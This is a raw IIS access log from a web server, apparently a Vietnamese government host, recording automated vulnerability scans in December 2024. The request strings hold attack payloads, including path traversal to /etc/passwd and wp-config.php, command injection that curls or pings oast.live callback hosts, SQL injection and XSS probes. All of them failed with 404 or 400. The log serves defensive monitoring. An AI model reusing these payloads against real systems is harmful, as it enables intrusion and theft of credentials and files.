2024-12-12 22:42:41 103.153.214.94 GET /jmx-console/ - 8172 - 156.251.25.152 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64;+rv:127.0)+Gecko/20100101+Firefox/127.0 - 404 7 0 229 2024-12-12 22:42:41 103.153.214.94 GET /jmx-console/ - 8172 - 156.251.25.152 Mozilla/5.0+(Kubuntu;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/127.0.0.0+Safari/537.36 - 404 7 0 229 2024-12-12 22:42:41 103.153.214.94 GET /jmx-console/ - 8172 - 156.251.25.152 Mozilla/5.0+(CentOS;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/125.0.0.0+Safari/537.36 - 404 7 0 242 2024-12-12 22:42:41 103.153.214.94 GET /jmx-console/ - 8172 - 156.251.25.152 Mozilla/5.0+(ZZ;+Linux+x86_64;+rv:122.0)+Gecko/20100101+Firefox/122.0 - 404 7 0 241 2024-12-12 22:42:54 103.153.214.94 GET /jmx-console/ - 8172 - 156.251.25.152 Mozilla/5.0+(Fedora;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/118.0.0.0+Safari/537.36 - 404 7 0 196 2024-12-12 22:42:54 103.153.214.94 GET /jmx-console/ - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.5+Safari/605.4.24 - 404 7 0 199 2024-12-12 22:42:54 103.153.214.94 GET /jmx-console/ - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.2.26 - 404 7 0 204 2024-12-12 22:43:26 103.153.214.94 GET /%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd - 8172 - 206.238.196.225 Mozilla/5.0+(Kubuntu;+Linux+x86_64;+rv:123.0)+Gecko/20100101+Firefox/123.0 - 400 0 0 59 2024-12-12 22:43:29 103.153.214.94 GET /tplus/SM/DTS/DownloadProxy.aspx preload=1&Path=../../Web.Config 8172 - 206.238.196.225 Mozilla/5.0+(Debian;+Linux+x86_64;+rv:126.0)+Gecko/20100101+Firefox/126.0 - 404 7 0 34 2024-12-12 22:43:31 103.153.214.94 GET /MicroStrategyWS/happyaxis.jsp - 8172 - 206.238.196.225 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64;+rv:128.0)+Gecko/20100101+Firefox/128.0 - 404 7 0 36 2024-12-12 22:43:32 103.153.214.94 POST /cgi-bin/luci/ - 8172 - 156.251.25.152 Mozilla/5.0+(Debian;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/119.0.0.0+Safari/537.36 - 404 7 0 201 2024-12-12 22:43:39 103.153.214.94 GET /admin/voyager-assets path=.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2Fetc/passwd 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+14)+AppleWebKit/616.19.3+(KHTML,+like+Gecko)+Version/17.6.11+Safari/616.19.3 - 404 7 0 43 2024-12-12 22:43:58 103.153.214.94 GET /wp-content/plugins/wordfence/lib/wordfenceClass.php file=/../../../../../../etc/passwd 8172 - 206.238.196.225 Mozilla/5.0+(X11;+CrOS+x86_64+14541.0.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/116.0.0.0+Safari/537.36 - 404 7 0 35 2024-12-12 22:44:02 103.153.214.94 GET /command.cgi cat%20/etc/passwd 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64;+rv:78.0)+Gecko/20100101+Firefox/78.0 - 404 7 0 32 2024-12-12 22:44:13 103.153.214.94 POST /v1/auth/users/login - 8172 - 156.251.25.152 Nacos-Server - 404 7 0 206 2024-12-12 22:44:13 103.153.214.94 POST /nacos/v1/auth/users/login - 8172 - 156.251.25.152 Nacos-Server - 404 7 0 209 2024-12-12 22:44:36 103.153.214.94 GET /org_execl_download.action filename=../../../../../../../../../../../../../etc/passwd 8172 - 206.238.196.225 Mozilla/5.0+(X11;+Linux+x86_64;+rv:128.0)+Gecko/20100101+Firefox/128.0 - 404 7 0 40 2024-12-12 22:44:36 103.153.214.94 GET /free_time.cgi - 8172 - 206.238.196.225 Mozilla/5.0+(Kubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/118.0.0.0+Safari/537.36 - 404 7 0 51 2024-12-12 22:44:58 103.153.214.94 POST /core/ajax/user.ajax.php - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/118.0.0.0+Safari/537.36 - 404 7 0 203 2024-12-12 22:45:09 103.153.214.94 GET /index.php v=d&p=dashboard 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64;+rv:71.0)+Gecko/20100101+Firefox/71.0 - 404 7 0 219 2024-12-12 22:45:59 103.153.214.94 GET /index.php q=file:///etc/passwd 8172 - 206.238.196.225 Mozilla/5.0+(Debian;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/119.0.0.0+Safari/537.36 - 404 7 0 39 2024-12-12 22:46:08 103.153.214.94 GET /actions/seomatic/meta-container/meta-link-container/ uri={{228*'98'}} 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.5+Safari/605.8.19 - 404 7 0 109 2024-12-12 22:46:13 103.153.214.94 GET /actions/seomatic/meta-container/all-meta-containers uri={{228*'98'}} 8172 - 206.238.196.225 Mozilla/5.0+(Kubuntu;+Linux+i686;+rv:122.0)+Gecko/20100101+Firefox/122.0 - 404 7 0 57 2024-12-12 22:47:42 103.153.214.94 GET /nagios/side.php - 8172 - 156.251.25.152 Mozilla/5.0+(Kubuntu;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/126.0.0.0+Safari/537.36 - 404 7 0 217 2024-12-12 22:47:42 103.153.214.94 GET /nagios/side.php - 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+Gecko/20100101+Firefox/128.0+(x64+de) - 404 7 0 217 2024-12-12 22:47:45 103.153.214.94 GET /sftp.json - 8172 - 206.238.196.225 Mozilla/5.0+(Knoppix;+Linux+x86_64;+rv:120.0)+Gecko/20100101+Firefox/120.0 - 404 7 0 45 2024-12-12 22:47:49 103.153.214.94 GET /.config/sftp.json - 8172 - 206.238.196.225 Mozilla/5.0+(ZZ;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/124.0.0.0+Safari/537.36 - 404 7 0 39 2024-12-12 22:47:53 103.153.214.94 GET /.vscode/sftp.json - 8172 - 206.238.196.225 Mozilla/5.0+(SS;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/125.0.0.0+Safari/537.36 - 404 7 0 35 2024-12-12 22:50:15 103.153.214.94 GET /composer/send_email to=SHES@FAAH&url=http://ctcj3jjbclslbev4n7q0ouxperpw9p1mo.oast.live 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:126.0)+Gecko/20100101+Firefox/126.0 - 404 7 0 39 2024-12-12 22:50:15 103.153.214.94 GET /showfile.php file=/etc/passwd 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/15.5+Safari/605.1.15 - 404 7 0 39 2024-12-12 22:50:40 103.153.214.94 GET /+CSCOT+/translation-table type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../ 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+17_4_1)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.0+Safari/605.1.15 - 404 11 0 65 2024-12-12 22:50:44 103.153.214.94 GET /+CSCOT+/oem-customization app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portal_inc.lua 8172 - 206.238.196.225 Mozilla/5.0+(Knoppix;+Linux+i686;+rv:121.0)+Gecko/20100101+Firefox/121.0 - 404 11 0 56 2024-12-12 22:51:17 103.153.214.94 GET / controller=AuthController&action=login 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/15.4+Safari/605.1.15 - 404 7 0 206 2024-12-12 22:52:46 103.153.214.94 GET /admingui/version/serverTasksGeneral serverTasksGeneral.GeneralWebserverTabs.TabHref=2 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+14_4_1)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.3.1+Safari/605.1.15 - 404 7 0 36 2024-12-12 22:52:51 103.153.214.94 GET /admingui/version/serverConfigurationsGeneral serverConfigurationsGeneral.GeneralWebserverTabs.TabHref=4 8172 - 206.238.196.225 Mozilla/5.0+(CentOS;+Linux+x86_64;+rv:123.0)+Gecko/20100101+Firefox/123.0 - 404 7 0 32 2024-12-12 22:53:00 103.153.214.94 GET /data/plugins_listing - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2623.87+Safari/537.36 - 404 7 0 59 2024-12-12 22:53:02 103.153.214.94 GET /wp-content/uploads/prime-mover-export-files/1/ - 8172 - 206.238.196.225 Mozilla/5.0+(Kubuntu;+Linux+i686;+rv:128.0)+Gecko/20100101+Firefox/128.0 - 404 7 0 55 2024-12-12 22:53:46 103.153.214.94 POST /login - 8172 - 156.251.25.152 Mozilla/5.0+(Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/121.0.0.0+Safari/537.36 - 404 7 0 204 2024-12-12 22:53:58 103.153.214.94 POST /netflow/jspui/j_security_check - 8172 - 156.251.25.152 Mozilla/5.0+(Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/128.0.0.0+Safari/537.36 - 404 7 0 202 2024-12-12 22:54:40 103.153.214.94 GET /GallerySite/filesrc/fotoilan/388/middle/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/etc/passwd - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.5+Safari/605.7.23 - 400 0 0 65 2024-12-12 22:54:46 103.153.214.94 GET /.remote-sync.json - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.5+Safari/605.8.19 - 404 7 0 33 2024-12-12 22:54:57 103.153.214.94 GET /spreadsheet-reader/test.php File=../../../../../../../../../../../etc/passwd 8172 - 206.238.196.225 Mozilla/5.0+(CentOS;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/126.0.0.0+Safari/537.36 - 404 7 0 57 2024-12-12 22:55:01 103.153.214.94 GET /nuovo/spreadsheet-reader/test.php File=../../../../../../../../../../../etc/passwd 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:86.0)+Gecko/20100101+Firefox/86.0 - 404 7 0 39 2024-12-12 22:55:08 103.153.214.94 GET /audit/gui_detail_view.php token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=shterm 8172 - 206.238.196.225 Mozilla/5.0+(ZZ;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/118.0.0.0+Safari/537.36 - 404 7 0 57 2024-12-12 22:55:37 103.153.214.94 GET /index.php option=com_perchadownloadsattach&controller=../../../../../../../../../../etc/passwd%00 8172 - 206.238.196.225 Mozilla/5.0+(CentOS;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/128.0.0.0+Safari/537.36 - 404 7 0 34 2024-12-12 22:55:37 103.153.214.94 OPTIONS / - 8172 - 206.238.196.225 Mozilla/5.0+(X11;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/124.0.0.0+Safari/537.36 - 404 7 0 32 2024-12-12 22:56:19 103.153.214.94 GET /.magnolia/admincentral - 8172 - 156.251.25.152 Mozilla/5.0+(Ubuntu;+Linux+i686;+rv:127.0)+Gecko/20100101+Firefox/127.0 - 404 7 0 209 2024-12-12 22:56:31 103.153.214.94 GET /fosagent/repl/download-file basedir=4&filepath=..\..\Windows\win.ini 8172 - 206.238.196.225 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/117.0.0.0+Safari/537.36 - 404 7 0 34 2024-12-12 22:56:31 103.153.214.94 GET /webshell4/login.php err=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 8172 - 206.238.196.225 Mozilla/5.0+(X11;+U;+Linux+i686;+en-US)+AppleWebKit/534.1+SUSE/6.0.428.0+(KHTML,+like+Gecko)+Chrome/6.0.428.0+Safari/534.1 - 404 7 0 33 2024-12-12 22:56:35 103.153.214.94 GET /fosagent/repl/download-snapshot name=..\..\..\..\..\..\..\Windows\win.ini 8172 - 206.238.196.225 Mozilla/5.0+(Ubuntu;+Linux+i686;+rv:126.0)+Gecko/20100101+Firefox/126.0 - 404 7 0 32 2024-12-12 22:56:35 103.153.214.94 GET /webshell4/login.php login=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 8172 - 206.238.196.225 Mozilla/5.0+(SS;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/122.0.0.0+Safari/537.36 - 404 7 0 32 2024-12-12 22:57:15 103.153.214.94 GET /wp-admin/setup-config.php step=1 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+WOW64;+rv:41.0)+Gecko/20100101+Firefox/128.0+(x64+de) - 404 7 0 67 2024-12-12 22:58:03 103.153.214.94 POST /webadmin/index.php - 8172 - 156.251.25.152 Mozilla/5.0+(Fedora;+Linux+i686;+rv:126.0)+Gecko/20100101+Firefox/126.0 - 404 7 0 201 2024-12-12 22:58:27 103.153.214.94 GET /my-account/ alg_wc_ev_verify_email=eyJpZCI6MSwiY29kZSI6MH0= 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:108.0)+Gecko/20100101+Firefox/108.0 - 404 7 0 36 2024-12-12 22:58:30 103.153.214.94 GET / alg_wc_ev_verify_email=eyJpZCI6MSwiY29kZSI6MH0= 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:97.0)+Gecko/20100101+Firefox/97.0 - 404 7 0 46 2024-12-12 22:59:08 103.153.214.94 GET /login_password_page.php - 8172 - 156.251.25.152 Mozilla/5.0+(X11;+U;+Linux+x86_64;+en-US;+rv:1.9.2.6)+Gecko/20100628+Ubuntu/10.04+(lucid)+Firefox/3.6.6 - 404 7 0 212 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2024-12-12 23:00:18 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2024-12-12 23:00:18 103.153.214.94 GET /lib/icinga/icinga-php-thirdparty/etc/passwd - 8172 - 206.238.196.225 Mozilla/5.0+(Debian;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/126.0.0.0+Safari/537.36 - 404 7 0 135 2024-12-12 23:00:21 103.153.214.94 GET /icinga2/lib/icinga/icinga-php-thirdparty/etc/passwd - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.2.1+Safari/605.2.20 - 404 7 0 63 2024-12-12 23:00:25 103.153.214.94 GET /icinga-web/lib/icinga/icinga-php-thirdparty/etc/passwd - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+6.1;+Win64;+x64;+rv:81.0)+Gecko/20100101+Firefox/81.0 - 404 7 0 32 2024-12-12 23:00:57 103.153.214.94 GET /opensis/ajax.php modname=misc/../../../../../../../../../../../../../etc/passwd&bypass=Transcripts.php 8172 - 206.238.196.225 Mozilla/5.0+(Kubuntu;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/123.0.0.0+Safari/537.36 - 404 7 0 55 2024-12-12 23:01:02 103.153.214.94 GET /ajax.php modname=misc/../../../../../../../../../../../../../etc/passwd&bypass=Transcripts.php 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_13_6)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/79.0.3945.88+Safari/537.36 - 404 7 0 56 2024-12-12 23:01:19 103.153.214.94 GET /wp-content/plugins/tutor/views/pages/instructors.php sub_page=/etc/passwd 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2623.87+Safari/537.36 - 404 7 0 36 2024-12-12 23:01:43 103.153.214.94 GET /downloadfile.php file=../../../../../../../../../../etc/passwd 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.3.1+Safari/605.1.1 - 404 7 0 32 2024-12-12 23:03:09 103.153.214.94 GET /control/userimage.html - 8172 - 156.251.25.152 Mozilla/5.0+(ZZ;+Linux+i686;+rv:125.0)+Gecko/20100101+Firefox/125.0 - 404 7 0 226 2024-12-12 23:03:11 103.153.214.94 POST /api/v1/login - 8172 - 156.251.25.152 Mozilla/5.0+(Kubuntu;+Linux+i686;+rv:124.0)+Gecko/20100101+Firefox/124.0 - 404 7 0 200 2024-12-12 23:03:19 103.153.214.94 GET /control/userimage.html - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+15_7_9)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.3.4+Safari/605.1.15 - 404 7 0 199 2024-12-12 23:03:21 103.153.214.94 GET /api/v1/session - 8172 - 156.251.25.152 Mozilla/5.0+(ZZ;+Linux+x86_64;+rv:120.0)+Gecko/20100101+Firefox/120.0 - 404 7 0 200 2024-12-12 23:04:10 103.153.214.94 GET /config/list - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/45.0.2454.101+Safari/537.36 - 404 7 0 37 2024-12-12 23:04:10 103.153.214.94 GET /cs/career/getSurvey.jsp fn=../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd 8172 - 206.238.196.225 Mozilla/5.0+(Kubuntu;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/120.0.0.0+Safari/537.36 - 404 7 0 35 2024-12-12 23:05:39 103.153.214.94 GET /api/v1/etc/passwd - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:90.0)+Gecko/20100101+Firefox/90.0 - 404 7 0 49 2024-12-12 23:05:39 103.153.214.94 GET /admin/ page=reports&date=2022-05-27%27%20union%20select%201,2,3,md5('999999999'),5,6,7,8,9,10--+ 8172 - 206.238.196.225 Mozilla/5.0+(ZZ;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/120.0.0.0+Safari/537.36 - 404 7 0 31 2024-12-12 23:05:40 103.153.214.94 GET /ipython/tree - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+14_2_1)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.3.1+Safari/605.1.15 - 404 7 0 32 2024-12-12 23:05:59 103.153.214.94 POST /service/rapture/session - 8172 - 156.251.25.152 Mozilla/5.0+(Ubuntu;+Linux+i686;+rv:123.0)+Gecko/20100101+Firefox/123.0 - 404 7 0 230 2024-12-12 23:06:00 103.153.214.94 POST /login - 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/97.0.4692.71+Safari/537.36 - 404 7 0 196 2024-12-12 23:06:09 103.153.214.94 GET /onlinePreview url=aHR0cDovL29hc3QuZnVuL3JvYm90cy50eHQ= 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+LoiLoNote/19.0.0+Version/17.1.2+Safari/605.1.15 - 404 7 0 56 2024-12-12 23:06:42 103.153.214.94 GET /wp-content/plugins/simple-image-manipulator/controller/download.php filepath=/etc/passwd 8172 - 206.238.196.225 Mozilla/5.0+(SS;+Linux+i686;+rv:128.0)+Gecko/20100101+Firefox/128.0 - 404 7 0 43 2024-12-12 23:06:42 103.153.214.94 GET /pages/systemcall.php command=cat%20/etc/passwd 8172 - 206.238.196.225 Mozilla/5.0+(Kubuntu;+Linux+i686;+rv:126.0)+Gecko/20100101+Firefox/126.0 - 404 7 0 37 2024-12-12 23:07:12 103.153.214.94 GET /pweb/careerapply/HrmCareerApplyPerView.jsp id=1%20union%20select%201,2,sys.fn_sqlvarbasetostr(HashBytes('MD5','999999999')),4,5,6,7 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/93.0.4577.82+Safari/537.36 - 404 7 0 55 2024-12-12 23:08:01 103.153.214.94 GET /wp-content/plugins/wpify-woo/deps/dragonbe/vies/examples/async_processing/queue.php/"><script>alert(document.domain)</script> - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+14.1)+AppleWebKit/618.27+(KHTML,+like+Gecko)+Version/17.4+Safari/618.27 - 400 0 0 63 2024-12-12 23:08:04 103.153.214.94 POST /api/tokens - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.1.35 - 404 7 0 202 2024-12-12 23:08:05 103.153.214.94 POST /auth/token - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/103.0.0.0+Safari/537.36 - 404 7 0 229 2024-12-12 23:08:21 103.153.214.94 GET /config/asst/system_setPassWordValidate.action/capture_handle.action captureFlag=true&captureCommand=ping%20ctcj3jjbclslbev4n7q0agh8doeesbjub.oast.live%20index.pcap 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.1.35 - 404 7 0 38 2024-12-12 23:08:21 103.153.214.94 GET /html/2word url=kkkkm 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+6.1;+Win64;+x64;+rv:80.0)+Gecko/20100101+Firefox/80.0 - 404 7 0 57 2024-12-12 23:08:44 103.153.214.94 GET /src/addressbook.php %3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 8172 - 206.238.196.225 Mozilla/5.0+(X11;+Linux+i686;+rv:127.0)+Gecko/20100101+Firefox/127.0 - 404 7 0 59 2024-12-12 23:08:49 103.153.214.94 GET /src/options.php optpage=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 8172 - 206.238.196.225 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64;+rv:123.0)+Gecko/20100101+Firefox/123.0 - 404 7 0 43 2024-12-12 23:08:53 103.153.214.94 GET /src/search.php mailbox=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&what=x&where=BODY&submit=Search 8172 - 206.238.196.225 Mozilla/5.0+(Ubuntu;+Linux+i686;+rv:120.0)+Gecko/20100101+Firefox/120.0 - 404 7 0 52 2024-12-12 23:08:56 103.153.214.94 GET /src/search.php mailbox=INBOX&what=x&where=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&submit=Search 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+14)+AppleWebKit/617.18+(KHTML,+like+Gecko)+Version/17.4+Safari/617.18 - 404 7 0 48 2024-12-12 23:09:01 103.153.214.94 GET /src/help.php chapter=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 8172 - 206.238.196.225 Mozilla/5.0+(Fedora;+Linux+i686;+rv:122.0)+Gecko/20100101+Firefox/122.0 - 404 7 0 49 2024-12-12 23:10:05 103.153.214.94 GET / - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.1.2+Safari/605.1.15 - 404 7 0 203 2024-12-12 23:10:16 103.153.214.94 POST /j_spring_security_check - 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/79.0.3945.130+Safari/537.36 - 404 7 0 227 2024-12-12 23:10:27 103.153.214.94 GET / - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.2+Safari/605.7.20 - 404 7 0 201 2024-12-12 23:10:33 103.153.214.94 GET /do/job.php job=download&url=ZGF0YS9jb25maWcucGg8 8172 - 206.238.196.225 Mozilla/5.0+(Fedora;+Linux+i686;+rv:124.0)+Gecko/20100101+Firefox/124.0 - 404 7 0 35 2024-12-12 23:10:47 103.153.214.94 GET /nagiosxi/login.php - 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:126.0)+Gecko/20100101+Firefox/126.0 - 404 7 0 228 2024-12-12 23:10:57 103.153.214.94 POST /login/verify - 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/43.0.2357.124+Safari/537.36 bcvt.kontum.gov.vn:8172/login/index 404 7 0 208 2024-12-12 23:10:59 103.153.214.94 POST /user/login/login - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.2+Safari/605.7.20 - 404 7 0 201 2024-12-12 23:10:59 103.153.214.94 GET /user/main - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/113.0.0.0+Safari/537.36 https://bcvt.kontum.gov.vn:8172/user/login/ 404 7 0 260 2024-12-12 23:11:56 103.153.214.94 GET /mbilling/lib/icepay/icepay.php democ=2q3kZ4vfBi5zj9UrgDg7Hzgkx2B;curl%20ctcj3jjbclslbev4n7q0ercmqwwu7ty59.oast.live; 8172 - 206.238.196.225 Mozilla/5.0+(Kubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/121.0.0.0+Safari/537.36 - 404 7 0 57 2024-12-12 23:11:57 103.153.214.94 GET /wp-content/plugins/simple-file-list/includes/ee-downloader.php eeFile=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e/wp-config.php 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+14)+AppleWebKit/617.18+(KHTML,+like+Gecko)+Version/17.4+Safari/617.18 - 404 7 0 35 2024-12-12 23:11:59 103.153.214.94 POST /x_organization_assemble_authentication/jaxrs/authentication/captcha - 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:107.0)+Gecko/20100101+Firefox/107.0 - 404 7 0 219 2024-12-12 23:12:15 103.153.214.94 GET /tool/log/c.php strip_slashes=md5&host=2q3kZF5nYkFj6pR4XQ2k3Hbbt1r 8172 - 206.238.196.225 Mozilla/5.0+(ZZ;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/129.0.0.0+Safari/537.36 - 404 7 0 37 2024-12-12 23:12:30 103.153.214.94 GET /cgi-bin/ExportAllSettings.sh - 8172 - 206.238.196.225 Mozilla/5.0+(X11;+Linux+x86_64;+rv:109.0)+Gecko/20100101+Firefox/117.0 - 404 7 0 38 2024-12-12 23:12:30 103.153.214.94 GET /defaultroot/download_old.jsp path=..&name=x&FileName=WEB-INF/web.xml 8172 - 206.238.196.225 